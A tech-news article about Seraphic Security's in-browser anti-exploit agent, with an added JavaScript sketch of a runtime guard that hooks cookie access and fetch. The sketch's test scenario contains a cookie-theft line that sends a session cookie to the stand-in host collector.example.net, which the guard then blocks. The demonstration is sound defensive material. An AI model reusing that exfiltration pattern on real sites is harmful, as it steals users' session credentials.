Home Browser Protection – The New Stack

The problem with most browser security products, as Seraphic Security co-founder and CEO Ilan Yeshua sees it, is that they expect you to go work somewhere else.

“It’s like you have a nice house and you want to secure your home, but someone comes in and says, ‘We’re going to take you to a safe house in a different place.’ You won’t like it; you would probably like to stay in your own house,” he explained.

Seraphic Security, based in Herzliya, Israel, with an additional office in Wilmington, Massachusetts, recently emerged from stealth after two years. Its approach is to provide security where workers live – in the browser, whether it’s Chrome, Firefox, Safari, Edge or otherwise.

Especially since the pandemic, with so many people working from home or in other remote locations, employees increasingly rely on SaaS apps on their personal devices to do their jobs, and security teams are struggling – or have even given up trying – to lock down what users can do. At the same time, the browser provides a giant window for hackers to carry out malicious activities.

“No one will tell employees, ‘Don’t use your own device.’ … Mobile, no one will tell you not to use it. And no one will tell you what apps to use. In the past, organizations used to dictate everything – you only work here, on my devices, and use the app I tell you to use.

“Today, employees pick apps and organizations follow because they realize the walled garden isn’t good for productivity,” he said.

CISOs are looking for seamless, frictionless security solutions, Frost & Sullivan wrote in a report on enterprise browser security.

“Backhauling all user traffic to secure it for remote users does not enable a native experience where users can directly access a cloud application,” the report said.

Driven by chance

Seraphic’s approach is inspired by Moving Target Defense, a concept introduced to the US military in the 1950s to increase complexity for attackers, reduce their window of opportunity and increase the costs of their efforts.

In the 1950s, when all communications were analog with no encryption, the US military used frequency hopping. Every few seconds, they would jump to a new frequency, explained co-founder and CTO Avihay Cohen. So if an adversary was listening, they had to continually spend time trying to find the next frequency. Although it wasn’t exactly rugged, it worked, he said.

He likens Seraphic’s approach to an ever-changing lock.

“We’re introducing a new type of lock that changes every time you try to pick it. So the lock is the browser in this case, and it’s getting more and more chaotic and random, which is completely and solidly capable of preventing exploitation,” he said.

It relies on a lightweight agent that runs within the JavaScript Engine (JSE), installed on client devices, which provides deep visibility into malicious activity as it unfolds, at which point the attack is blocked. The agent has negligible impact on system performance, according to Cohen, and some customer staff didn’t even notice a difference when installing it.

The technology creates an abstraction layer that produces rich runtime telemetry, which is used to thwart attacks such as zero-day and unpatched n-day exploits and sophisticated spear phishing.

Runtime telemetry also enables Seraphic Security to provide granular policy governance and enforcement, preventing issues such as sensitive data leakage and user credential theft in real time.
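To make the idea of an in-browser agent concrete, here is an added illustration (written for this article, not Seraphic's code) of a small "runtime guard" that sits inside the page, hooks two browser APIs, records a telemetry event for every call and enforces a policy on the spot. The hook layout, the policy object and the fake window it runs against are assumptions for the illustration; it runs offline under Node against a constructed `document` and `fetch`.

```javascript
// Illustrative in-page runtime guard (added example, not Seraphic's code).
// Two hooks: document.cookie reads by page script are denied, and fetch() may
// only reach allow-listed origins. Every call is recorded as telemetry whether
// it is allowed or not. The hook shape and policy fields are assumptions.

const telemetry = [];

function installGuard(win, policy) {
  const doc = win.document;
  const cookieDesc = Object.getOwnPropertyDescriptor(doc, "cookie");

  // Hook 1: document.cookie. A denied read returns an empty string instead of
  // the real cookie jar, so a credential-stealing script sees nothing useful.
  Object.defineProperty(doc, "cookie", {
    configurable: true,
    get() {
      const allowed = policy.allowCookieRead === true;
      telemetry.push({ api: "document.cookie", action: "read", allowed });
      return allowed ? cookieDesc.get.call(doc) : "";
    },
    set(value) {
      telemetry.push({ api: "document.cookie", action: "write", allowed: true });
      cookieDesc.set.call(doc, value);
    },
  });

  // Hook 2: fetch. Requests to origins outside the allow-list are refused
  // before any network activity happens; the decision is recorded either way.
  const realFetch = win.fetch;
  win.fetch = function guardedFetch(input, init) {
    const origin = new URL(String(input), win.location.href).origin;
    const allowed = policy.allowedOrigins.includes(origin);
    telemetry.push({ api: "fetch", origin, allowed });
    if (!allowed) {
      return Promise.reject(new Error("blocked by policy: " + origin));
    }
    return realFetch.call(win, input, init);
  };
}

// Constructed stand-in for a browser window so the guard can run under Node.
function makeFakeWindow() {
  let jar = "session=abc123"; // constructed sample cookie
  const doc = {};
  Object.defineProperty(doc, "cookie", {
    configurable: true,
    get() { return jar; },
    set(value) { jar = jar + "; " + value; },
  });
  const requests = []; // what the "real" fetch actually sent
  return {
    location: { href: "https://app.example.com/dashboard" },
    document: doc,
    requests,
    fetch(input) {
      requests.push(String(input));
      return Promise.resolve({ ok: true, url: String(input) });
    },
  };
}

// Runs a constructed scenario: untrusted script tries to read the cookie and
// send it to an outside origin, then legitimate code makes a same-origin call.
function runScenario() {
  telemetry.length = 0;
  const win = makeFakeWindow();
  installGuard(win, {
    allowCookieRead: false,
    allowedOrigins: ["https://app.example.com"],
  });

  const seenCookie = win.document.cookie; // denied: ""
  win.fetch("https://collector.example.net/c?d=" + encodeURIComponent(seenCookie))
    .catch(() => {}); // denied: origin not allow-listed
  win.fetch("/api/profile").catch(() => {}); // allowed: same origin

  return {
    seenCookie,
    events: telemetry.slice(),
    reachedNetwork: win.requests.slice(),
  };
}

module.exports = { installGuard, makeFakeWindow, runScenario, telemetry };
```

The point of the layout is that the decision and the telemetry are produced at the call site, inside the page, rather than by inspecting traffic at a proxy after the fact; a real agent would hook far more of the platform and randomize how it does so, which this sketch does not attempt.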

At the “crime scene”

Two things make the Seraphic approach unique, according to Yeshua. First of all, it does not rely on detection.

“By definition, when you do detection, you base yourself on known patterns. You do some sort of comparison with signatures or other things. And then the problem is that hackers are always one step ahead,” he said.

“If you don’t base your approach on detection, you don’t fall into this cat-and-mouse game because you don’t care about the model. You are simply modifying the target in a way that is randomized unexploitably by the code, because any malicious code to run must get brackets inside the target. And if we change the target in an unexpected way for the malicious code, then it becomes unusable,” he said.

The second is that most existing solutions – endpoint protection (EPP) or endpoint detection and response (EDR) – attempt to monitor and mitigate the browser from the perimeter, rather than from inside the browser itself. They act after execution and rely on detection. Additionally, they want workers to use only a dedicated browser.

Some of the newer competitors in this space include Dallas-based Island, which offers a secure enterprise browser; the Israeli startup Guardio, which offers an extension in the browser; and Israel-based Talon, which has developed a device-agnostic solution called TalonWork that acts as a secure browser for businesses.

Says Yeshua: “We are not an agent of the operating system. We are at the level of the browser itself. We say we are located at the scene of the crime. If the scene of the crime is the browser, why should we try to monitor the browser, audit it, and mitigate it from the perimeter? Let’s put our capabilities inside the browser.”

Organizations can set governance policies such as copy/paste and data loss prevention controls. An optical character recognition (OCR) engine can scan images so that controls apply to sensitive content in them as well, and there are different deployment choices. For example, should the solution work even when an employee is browsing the web for personal use?

Depending on the deployment configuration, Yeshua and Cohen say the agent can continue to protect workers even outside of working hours, but they maintain that privacy is still preserved: because all information processing takes place locally in the agent, no data is sent to a proxy, gateway, or server. Nothing goes to the cloud.

A testimonial

Israeli company Clal Insurance and Finance had been using full remote browser isolation (RBI) for nearly seven years and was happy with it for the first five, according to Haim Inger, CTO and vice president of infrastructure and operations.

Over the past two years, however, as it grew its footprint in the public cloud, the company began to encounter more sites that did not perform well or at all with the full RBI solution. The user experience was badly damaged, he said.

With responsibility for all of the company’s IT infrastructure and cyber defense products, he and his team set out to find more appropriate solutions. He explained what they found:

  • Full RBI solutions are all the same, and you’ll end up with many websites that aren’t RBI compatible, so you’ll be accessing those sites directly, bypassing full RBI protection for sites that contain your most valuable data, such as a public cloud-based CRM.
  • Other providers offer a partial RBI approach, accessing unknown sites with RBI and known sites with just a proxy server. This approach is very dangerous because an attacker can install malware on one of your well-known and good sites so that browsing from the organization causes immediate damage to the computer and from there to the entire network.

“So our conclusion was [that] we need to find a product that secures the browser and protects it 100% of the time of use while enabling a native user experience,” he said.

They consulted with a company that offered a secure Chromium-based browser, which seemed like a good idea at first, but after a proof of concept, they found three issues:

  • We needed to replace the Edge or Chrome browser in our organization. It’s not a simple thing to do. We still have a lot of web apps that require the Edge compatibility feature for IE11 and even IE6.
  • The dedicated browser needs to be updated every time Google finds a zero day in its browser, which happens every month.
  • So even if we rewrite our old apps to be native to Chromium and use the new secure browser as our only browser, we can’t update the browser every three to four weeks because we have around 200 apps that we need to make sure will work with the new version of the browser. It takes us about six weeks to complete these tests, and using this solution means four to six weeks of being vulnerable to a known zero-day attack.

“That’s the point we met Seraphic,” he said. “They promised us that their solution would protect us from zero-day attacks with our current Edge and Chrome browsers while giving us a full native user experience, and even new features we never had, like clickjacking detection, anti-phishing and protection against other well-known browser-based attacks.”

He admitted it sounded too good to be true, but he was curious, so he decided to do a POC. The teams ran well-known attacks against older, unprotected versions of Chrome and Edge, and then against the Seraphic solution on the same machines using the same old browsers. They found that 100% of the previously successful attacks were blocked with Seraphic, with equal success for newer features like anti-phishing.

They then checked the user experience. “Users have really been asking me when can I migrate them from the full RBI to the ‘new surf thing you’re testing,’” Inger said.

The Seraphic technology replaced both the previous RBI solution and an older proxy server the company used, he said.

The owner of TNS, Insight Partners, is an investor in Island.

Feature image via Pixabay.
